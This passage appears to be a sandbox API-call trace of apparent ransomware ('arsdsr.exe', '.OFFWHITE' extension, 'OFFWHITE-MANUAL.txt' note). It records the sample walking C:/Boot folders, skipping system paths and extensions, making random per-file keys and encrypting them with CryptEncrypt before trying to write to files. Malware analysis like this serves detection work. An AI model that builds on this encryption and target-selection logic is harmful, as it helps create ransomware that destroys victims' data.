ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.324] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.324] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.324] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.324] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.324] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.324] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.325] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\sv-SE\\" | out: lpString1="C:/Boot\\sv-SE\\") returned="C:/Boot\\sv-SE\\" [0082.325] lstrcatW (in: lpString1="C:/Boot\\sv-SE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\sv-SE\\bootmgr.exe.mui") returned="C:/Boot\\sv-SE\\bootmgr.exe.mui" [0082.325] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.325] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.325] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.325] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.326] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.326] GetProcessHeap () returned 0x500000 [0082.326] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd00 [0082.326] CreateFileW (lpFileName="C:/Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.327] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.327] GetProcessHeap () returned 0x500000 [0082.327] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5485c8 [0082.327] GetProcessHeap () returned 0x500000 [0082.327] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548610 [0082.327] GetProcessHeap () returned 0x500000 [0082.327] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5217a0 [0082.327] GetProcessHeap () returned 0x500000 [0082.327] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5218a8 [0082.327] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.327] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.327] SystemFunction036 (in: RandomBuffer=0x5485c8, RandomBufferLength=0x10 | out: RandomBuffer=0x5485c8) returned 1 [0082.327] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.327] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.327] SystemFunction036 (in: RandomBuffer=0x548610, RandomBufferLength=0x10 | out: RandomBuffer=0x548610) returned 1 [0082.327] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.327] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.327] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5217a0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5217a0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.328] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.328] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.328] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5218a8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5218a8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.328] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.328] SetLastError (dwErrCode=0x0) [0082.328] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5217a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.328] GetLastError () returned 0x6 [0082.328] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.328] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.328] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2=".") returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="..") returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="...") returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="windows") returned -1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="$recycle.bin") returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="rsa") returned 1 [0082.328] lstrcmpiW (lpString1="tr-TR", lpString2="ntuser.dat") returned 1 [0082.329] lstrcmpiW (lpString1="tr-TR", lpString2="programdata") returned 1 [0082.329] lstrcmpiW (lpString1="tr-TR", lpString2="appdata") returned 1 [0082.329] lstrcmpiW (lpString1="tr-TR", lpString2="program files") returned 1 [0082.329] lstrcmpiW (lpString1="tr-TR", lpString2="program files (x86)") returned 1 [0082.329] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.329] lstrcatW (in: lpString1="C:/Boot\\", lpString2="tr-TR" | out: lpString1="C:/Boot\\tr-TR") returned="C:/Boot\\tr-TR" [0082.329] lstrcatW (in: lpString1="C:/Boot\\tr-TR", lpString2="\\" | out: lpString1="C:/Boot\\tr-TR\\") returned="C:/Boot\\tr-TR\\" [0082.329] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\tr-TR\\" | out: lpString1="C:/Boot\\tr-TR\\") returned="C:/Boot\\tr-TR\\" [0082.329] lstrcatW (in: lpString1="C:/Boot\\tr-TR\\", lpString2="*.*" | out: lpString1="C:/Boot\\tr-TR\\*.*") returned="C:/Boot\\tr-TR\\*.*" [0082.329] FindFirstFileW (in: lpFileName="C:/Boot\\tr-TR\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.329] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.329] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.329] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.329] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.329] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.329] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.330] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.330] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\tr-TR\\" | out: lpString1="C:/Boot\\tr-TR\\") returned="C:/Boot\\tr-TR\\" [0082.330] lstrcatW (in: lpString1="C:/Boot\\tr-TR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\tr-TR\\bootmgr.exe.mui") returned="C:/Boot\\tr-TR\\bootmgr.exe.mui" [0082.330] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.330] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.330] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.330] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.331] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.331] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.331] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.331] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.331] GetProcessHeap () returned 0x500000 [0082.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd10 [0082.331] CreateFileW (lpFileName="C:/Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.331] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.331] GetProcessHeap () returned 0x500000 [0082.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548628 [0082.331] GetProcessHeap () returned 0x500000 [0082.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548640 [0082.331] GetProcessHeap () returned 0x500000 [0082.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5219b0 [0082.332] GetProcessHeap () returned 0x500000 [0082.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521ab8 [0082.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.332] SystemFunction036 (in: RandomBuffer=0x548628, RandomBufferLength=0x10 | out: RandomBuffer=0x548628) returned 1 [0082.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.332] SystemFunction036 (in: RandomBuffer=0x548640, RandomBufferLength=0x10 | out: RandomBuffer=0x548640) returned 1 [0082.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.332] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5219b0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5219b0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.332] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521ab8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521ab8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.332] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.332] SetLastError (dwErrCode=0x0) [0082.332] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5219b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.333] GetLastError () returned 0x6 [0082.333] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.333] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.333] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2=".") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="..") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="...") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="windows") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="$recycle.bin") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="rsa") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="ntuser.dat") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="programdata") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="appdata") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="program files") returned 1 [0082.333] lstrcmpiW (lpString1="zh-CN", lpString2="program files (x86)") returned 1 [0082.333] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.333] lstrcatW (in: lpString1="C:/Boot\\", lpString2="zh-CN" | out: lpString1="C:/Boot\\zh-CN") returned="C:/Boot\\zh-CN" [0082.333] lstrcatW (in: lpString1="C:/Boot\\zh-CN", lpString2="\\" | out: lpString1="C:/Boot\\zh-CN\\") returned="C:/Boot\\zh-CN\\" [0082.333] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\zh-CN\\" | out: lpString1="C:/Boot\\zh-CN\\") returned="C:/Boot\\zh-CN\\" [0082.333] lstrcatW (in: lpString1="C:/Boot\\zh-CN\\", lpString2="*.*" | out: lpString1="C:/Boot\\zh-CN\\*.*") returned="C:/Boot\\zh-CN\\*.*" [0082.333] FindFirstFileW (in: lpFileName="C:/Boot\\zh-CN\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.334] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.334] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.334] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.334] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\zh-CN\\" | out: lpString1="C:/Boot\\zh-CN\\") returned="C:/Boot\\zh-CN\\" [0082.334] lstrcatW (in: lpString1="C:/Boot\\zh-CN\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\zh-CN\\bootmgr.exe.mui") returned="C:/Boot\\zh-CN\\bootmgr.exe.mui" [0082.334] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.334] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.335] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.335] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.335] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.335] GetProcessHeap () returned 0x500000 [0082.335] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd20 [0082.335] CreateFileW (lpFileName="C:/Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.337] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.337] GetProcessHeap () returned 0x500000 [0082.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548658 [0082.337] GetProcessHeap () returned 0x500000 [0082.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548670 [0082.337] GetProcessHeap () returned 0x500000 [0082.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521bc0 [0082.337] GetProcessHeap () returned 0x500000 [0082.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521cc8 [0082.337] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.337] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.337] SystemFunction036 (in: RandomBuffer=0x548658, RandomBufferLength=0x10 | out: RandomBuffer=0x548658) returned 1 [0082.337] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.337] lstrcmpiW (lpString1="kernel32.dll", 